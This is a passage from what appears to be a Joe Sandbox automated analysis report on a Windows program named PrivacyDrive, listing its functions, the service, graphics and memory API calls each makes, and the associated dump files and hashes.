                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0041D2CA
                                • OpenServiceW.ADVAPI32(00000000,PDSvc,000F01FF), ref: 0041D2E2
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D30F
                                  • Part of subcall function 0041CD20: QueryServiceStatus.ADVAPI32(?,?), ref: 0041CD38
                                  • Part of subcall function 0041CD20: ControlService.ADVAPI32(?,00000001,?,?,?,?,?), ref: 0041CD51
                                  • Part of subcall function 0041CD20: QueryServiceStatus.ADVAPI32(?,?,?,00000001,?,?,?,?,?), ref: 0041CD65
                                  • Part of subcall function 0041CD20: Sleep.KERNEL32(000000FA,?,?,?,00000001,?,?,?,?,?), ref: 0041CD7A
                                • DeleteService.ADVAPI32(00000000), ref: 0041D2F6
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D2FD
                                • Sleep.KERNEL32(000001F4), ref: 0041D308
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Service$CloseHandleOpenQuerySleepStatus$ControlDeleteManager
                                • String ID: PDSvc
                                • API String ID: 2902594379-694389191
                                • Opcode ID: 18ef353e2f3e6fe88b6064f38104e4e2009b59f4e5c50a92099b0e8282a9d167
                                • Instruction ID: 212d54a4e74034282ccee0f31bf4c198baec525568f7ed870f6b069659ef7540
                                • Opcode Fuzzy Hash: 18ef353e2f3e6fe88b6064f38104e4e2009b59f4e5c50a92099b0e8282a9d167
                                • Instruction Fuzzy Hash: 29E0653664271167C22227506C2DBBF39259BAAB53F040014F601951F5CF688445E766
                                Function 004CB7F0 Relevance: 12.1, APIs: 8, Instructions: 105COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateImageAttributes.GDIPLUS(?,7563D392), ref: 004CB826
                                • GdipSetImageAttributesGamma.GDIPLUS(00000000,00000001,00000001), ref: 004CB848
                                • GdipGetImageHeight.GDIPLUS(?,00000000), ref: 004CB870
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 004CB893
                                • GdipGetImageHeight.GDIPLUS(?,?), ref: 004CB8B0
                                • GdipGetImageWidth.GDIPLUS(?,00000000), ref: 004CB8CA
                                • GdipDrawImageRectRectI.GDIPLUS(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000000,00000000), ref: 004CB8FB
                                • GdipDisposeImageAttributes.GDIPLUS(00000000), ref: 004CB912
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: GdipImage$Attributes$HeightRectWidth$CreateDisposeDrawGamma
                                • String ID:
                                • API String ID: 2893027462-0
                                • Opcode ID: 2961aa08ddc838b62e7493934ccb5b823b3ee8569c1af15c03f74748ac968961
                                • Instruction ID: e206954ee92cf07ad75d2eefddd4e5ff8851b351935c1c42d48a5d3536bd4898
                                • Opcode Fuzzy Hash: 2961aa08ddc838b62e7493934ccb5b823b3ee8569c1af15c03f74748ac968961
                                • Instruction Fuzzy Hash: D04116B590030AEFDF11CF95CD40BAEBBF8FB08710F10411AE915A6290E731A914DFA4
                                Function 004713B0 Relevance: 12.1, APIs: 8, Instructions: 104COMMON
                                Download Yara Rule
                                APIs
                                • GetDC.USER32(00000000), ref: 004713DC
                                • GdipCreateFromHDC.GDIPLUS(00000000,?,?,?,?,?,?,?,005450A0,000000FF,?,00471317), ref: 004713F8
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00471429
                                • GdipSetTextRenderingHint.GDIPLUS(00471317,00000005), ref: 0047143B
                                • GdipMeasureString.GDIPLUS(00471317,?,000000FF,00000000,?,00000000,?,000000FF,?), ref: 00471481
                                • ReleaseDC.USER32(00000000,00000000), ref: 00471492
                                • GdipDeleteStringFormat.GDIPLUS(00000000), ref: 0047149F
                                • GdipDeleteGraphics.GDIPLUS(00471317), ref: 004714AD
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$CreateDeleteFormat$FromGraphicsHintMeasureReleaseRenderingText
                                • String ID:
                                • API String ID: 1461394554-0
                                • Opcode ID: a841c22d1ba813317989dea405998b52f30600b237288a2a0fefa29c0d7e33da
                                • Instruction ID: ab721c78b5136c50d56373f1f2aca0b7c119ef84d06e3f123cf32b1f00f6219f
                                • Opcode Fuzzy Hash: a841c22d1ba813317989dea405998b52f30600b237288a2a0fefa29c0d7e33da
                                • Instruction Fuzzy Hash: D8418471A00309EFDB00CFA8DC48BEEBBB4FB59715F10822AE915E7290E7755905DBA4
                                Function 00430760 Relevance: 12.1, APIs: 6, Strings: 2, Instructions: 66COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00430770
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00430788
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,TIP), ref: 004307B5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004307C7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,TIP), ref: 004307F0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00430802
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$TIP
                                • API String ID: 904232820-147420040
                                • Opcode ID: 8964d6c112c7bca3b53236b8cb33b4d041e69ff2f951fe464d751258f04031f7
                                • Instruction ID: dbf7918c831f9a03d2635bd19e7595eaa05778a5016e3c696951201567c20fcd
                                • Opcode Fuzzy Hash: 8964d6c112c7bca3b53236b8cb33b4d041e69ff2f951fe464d751258f04031f7
                                • Instruction Fuzzy Hash: 38118471380705ABDB14E7769D96FB6ABE8BB44756F04042EB649C3180EAE4F804DB24
                                Function 004B2A70 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 333timeCOMMON
                                Download Yara Rule
                                APIs
                                • GetLocalTime.KERNEL32(?,?,?,0056C40C,?,00000001,00000000,00000000,0056C40C,?,00000001,7563D392,?,?), ref: 004B2B81
                                  • Part of subcall function 004FFB7D: std::exception::exception.LIBCMT ref: 004FFB90
                                  • Part of subcall function 004FFB7D: __CxxThrowException@8.LIBCMT ref: 004FFBA5
                                  • Part of subcall function 00436AE0: WideCharToMultiByte.KERNEL32(76ECFFB0,00000000,?,000000FF,?,?,00000000,00000000,?,?,004C27B9,?,00000003,?,00583B28,00000000), ref: 00436B01
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ByteCharException@8LocalMultiThrowTimeWidestd::exception::exception
                                • String ID: !@$8GW$Verify1.dat$Verify2.dat$invalid string position
                                • API String ID: 658754322-3542193857
                                • Opcode ID: 2865dd513982ea41d174e31042dadf681ea325f52b5af1deaa7a778ca16c9338
                                • Instruction ID: 35868cee18ad6352b1d754c4c37c8c9ebe28a1ed777f048a653082ae1ee53204
                                • Opcode Fuzzy Hash: 2865dd513982ea41d174e31042dadf681ea325f52b5af1deaa7a778ca16c9338
                                • Instruction Fuzzy Hash: F1D1B270E002199BCF14DFA5C955BEEBBB4BF48304F14416EE815A7381E7B89A45CBA4
                                Function 004269D0 Relevance: 10.7, APIs: 7, Instructions: 248COMMON
                                Download Yara Rule
                                APIs
                                • GdipCreateStringFormat.GDIPLUS ref: 00426A19
                                • GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 00426A38
                                • GdipSetStringFormatAlign.GDIPLUS(?,00000002), ref: 00426A49
                                • GdipSetTextRenderingHint.GDIPLUS(?,00000005,?,00000000,00000000,?,00000000,00000000,FF414141), ref: 00426AF9
                                • GdipMeasureString.GDIPLUS(?,?,000000FF,00000000,?,00000000,00000000,?,?), ref: 00426B48
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 00426D0D
                                • GdipDeleteStringFormat.GDIPLUS(?), ref: 00426D1B
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$String$Format$CreateDelete$AlignHintMeasureRenderingText
                                • String ID:
                                • API String ID: 3667060907-0
                                • Opcode ID: a4b571513013c912499df570ec6bef9de3435a58d702f418765b71787a85ed61
                                • Instruction ID: a5c7aacf98574f45d66f153d730d1acb62e70b5b6ff8545beb4406e10d3934a7
                                • Opcode Fuzzy Hash: a4b571513013c912499df570ec6bef9de3435a58d702f418765b71787a85ed61
                                • Instruction Fuzzy Hash: 52A14871204702EFD718CF28D884B5ABBE5FB89304F048A1DF5999B2A0DB70E958CB95
                                Function 004A3230 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 219COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 004A3510: GetDC.USER32(00000000), ref: 004A354E
                                  • Part of subcall function 004A3510: GdipCreateFromHDC.GDIPLUS(00000000,000000FF), ref: 004A356B
                                  • Part of subcall function 004A3510: GdipCreateStringFormat.GDIPLUS(00000000,00000000,?), ref: 004A35C4
                                  • Part of subcall function 004A3510: SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004A35DB
                                  • Part of subcall function 004A3510: GdipSetTextRenderingHint.GDIPLUS(005496D0,00000005), ref: 004A3617
                                  • Part of subcall function 004A3510: GdipSetStringFormatTrimming.GDIPLUS(00000000,00000002), ref: 004A362D
                                • GdipSetStringFormatTrimming.GDIPLUS(000000FF,00000004,?,00000000,7563D392,00000000,?), ref: 004A32E4
                                • GdipSetStringFormatLineAlign.GDIPLUS(000000FF,00000000), ref: 004A3307
                                  • Part of subcall function 004A37E0: GetDC.USER32(00000000), ref: 004A3818
                                  • Part of subcall function 004A37E0: GdipCreateFromHDC.GDIPLUS(00000000,00549710,?,?,?,?,?,?,?,?,?,?,?,?,-00000064), ref: 004A3837
                                  • Part of subcall function 004A37E0: GdipCreateStringFormat.GDIPLUS(00000000), ref: 004A389F
                                  • Part of subcall function 004A37E0: SystemParametersInfoW.USER32(00000030,00000000,-00000064,00000000), ref: 004A38C4
                                  • Part of subcall function 004A37E0: GdipSetTextRenderingHint.GDIPLUS(000000FF,00000005), ref: 004A38ED
                                  • Part of subcall function 004A37E0: GdipSetStringFormatTrimming.GDIPLUS(00000000,00000000), ref: 004A3900
                                • GdipSetStringFormatTrimming.GDIPLUS(000000FF,00000004,?,00000000,7563D392,00000000,?), ref: 004A32F5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$FormatString$CreateTrimming$FromHintInfoParametersRenderingSystemText$AlignLine
                                • String ID: !@$cbfxMessageBox$d
                                • API String ID: 1862861530-2623893205
                                • Opcode ID: fd805fc617f23f0ddbbec1510adcb90817351557563ff82dc7ba3c138e43fe3e
                                • Instruction ID: d1a81a9ce38d88d882e8ecf0d38e09747c162d49e0c5f859e7fe44805090d02b
                                • Opcode Fuzzy Hash: fd805fc617f23f0ddbbec1510adcb90817351557563ff82dc7ba3c138e43fe3e
                                • Instruction Fuzzy Hash: 93917C71A00209DFCB10CFA8D884BAEBBF1FF59314F14416AE905AB390EB75AA45DB44
                                Function 004CC900 Relevance: 10.7, APIs: 7, Instructions: 199COMMON
                                Download Yara Rule
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ParentWindow$CaptureLongRectRelease
                                • String ID:
                                • API String ID: 1974726318-0
                                • Opcode ID: dee0282b1a9ecfe3e27abf076a0e776c20efda0c19094a7a7e3fdbf1b0c7a09e
                                • Instruction ID: 759902af7c881f52c76f688f99f54b69fd3a322a977c9367e2e64732b101450c
                                • Opcode Fuzzy Hash: dee0282b1a9ecfe3e27abf076a0e776c20efda0c19094a7a7e3fdbf1b0c7a09e
                                • Instruction Fuzzy Hash: 3C814B75A007059FEB60CF68C895FAABBF4BF44704F00491EE999A7380DB75B944CBA4
                                Function 00486170 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 192COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00489F70: GdipCreateStringFormat.GDIPLUS(00000000,00000000,000002CC,7563D392), ref: 00489FE7
                                  • Part of subcall function 00489F70: GdipSetStringFormatLineAlign.GDIPLUS(000002CC,00000001), ref: 0048A0FD
                                  • Part of subcall function 00412230: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00412288
                                • GdipCreatePath.GDIPLUS(00000000,00000670,000005B4,7563D392,?,?,00000000), ref: 0048638A
                                • GdipCreatePath.GDIPLUS(00000000,00000678,?,?,00000000), ref: 004863A2
                                • GdipCreatePath.GDIPLUS(00000000,00000680,?,?,00000000), ref: 004863BA
                                • GdipCreatePath.GDIPLUS(00000000,00000688,?,?,00000000), ref: 004863D2
                                • GdipCreatePath.GDIPLUS(00000000,00000690,?,?,00000000), ref: 004863EA
                                  • Part of subcall function 00489E40: Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 00489E7C
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Gdip$Create$Path$Concurrency::details::_Concurrent_queue_base_v4::_FormatInternal_throw_exceptionString$AlignLine
                                • String ID: %
                                • API String ID: 3993587154-2567322570
                                • Opcode ID: 78104fb18b7a79f78cd620dd19bb917500539e83cf270f67fb2314767728e3a4
                                • Instruction ID: 255bfa3c1203ba6c6611ab499229da4eb4c3a6f4232d4012b071132f61ba6529
                                • Opcode Fuzzy Hash: 78104fb18b7a79f78cd620dd19bb917500539e83cf270f67fb2314767728e3a4
                                • Instruction Fuzzy Hash: 54A109B0805389DEDB10DF58C55878ABFF0BF05318F1981ADD858AF292D7B99608CFA1
                                Function 0042E110 Relevance: 10.7, APIs: 7, Instructions: 185COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040905E), ref: 0042E13A
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0042E1C7
                                • GetCursorPos.USER32(?), ref: 0042E1DD
                                • SetWindowPos.USER32(00000000), ref: 0042E2BD
                                • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,0040905E), ref: 0042E30B
                                • SetWindowPos.USER32(00000000), ref: 0042E33D
                                • LeaveCriticalSection.KERNEL32(?), ref: 0042E34E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterWindow$CursorInfoLeaveParametersSystem
                                • String ID:
                                • API String ID: 3542279758-0
                                • Opcode ID: f77588df6d40e2a2c5452458e22c8c1e4378ac40ec64d7b6d3882e35b73d68b7
                                • Instruction ID: 0adf947a82cc22e8cdadf97dfe462cb4a18e9a362bfee68fe9ccfdf355158ebd
                                • Opcode Fuzzy Hash: f77588df6d40e2a2c5452458e22c8c1e4378ac40ec64d7b6d3882e35b73d68b7
                                • Instruction Fuzzy Hash: CB61DD30304311EBD708CB65DC98FAAB7A9BF89704F50061EF55697290DB34A954CBAA
                                Function 004DF380 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 179COMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memmove
                                • String ID: M$M
                                • API String ID: 4104443479-2716082652
                                • Opcode ID: 5bb24ca44c51592907520856addba2660847b11f1b4736d21d04624c9af85700
                                • Instruction ID: 63af274ed7d252d932b86dd0c62c3c644047ca8161c42c53bd65e7e67be1847d
                                • Opcode Fuzzy Hash: 5bb24ca44c51592907520856addba2660847b11f1b4736d21d04624c9af85700
                                • Instruction Fuzzy Hash: 0851C571A002049FDB24DF2CD85579EBBB4FF44314F14866EE8169B381D736E905CB90
                                Function 00420330 Relevance: 10.7, APIs: 7, Instructions: 176memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GlobalAlloc.KERNEL32(00000000,00000001,?,?,00000001,7563D392,00000001), ref: 004203B2
                                • GlobalLock.KERNEL32(00000000), ref: 004203C3
                                • _memmove.LIBCMT ref: 004203D7
                                • CreateStreamOnHGlobal.OLE32(00000000,00000000,00000000), ref: 004203E5
                                  • Part of subcall function 004207F0: GdipAlloc.GDIPLUS(00000010,7563D392,00000000,?,00000000,00000000,0053C6F8,000000FF,?,00420403), ref: 00420819
                                  • Part of subcall function 004207F0: GdipLoadImageFromStream.GDIPLUS(00000000,00000004), ref: 00420840
                                • GdipAlloc.GDIPLUS(00000010), ref: 0042041D
                                  • Part of subcall function 00408CC0: GdipGetImageHeight.GDIPLUS(?,00000000,00000000,00000000,?,00420435), ref: 00408CD5
                                  • Part of subcall function 00408C90: GdipGetImageWidth.GDIPLUS(?,00000000,00000000,00000000,?,0042043D,00000000), ref: 00408CA5
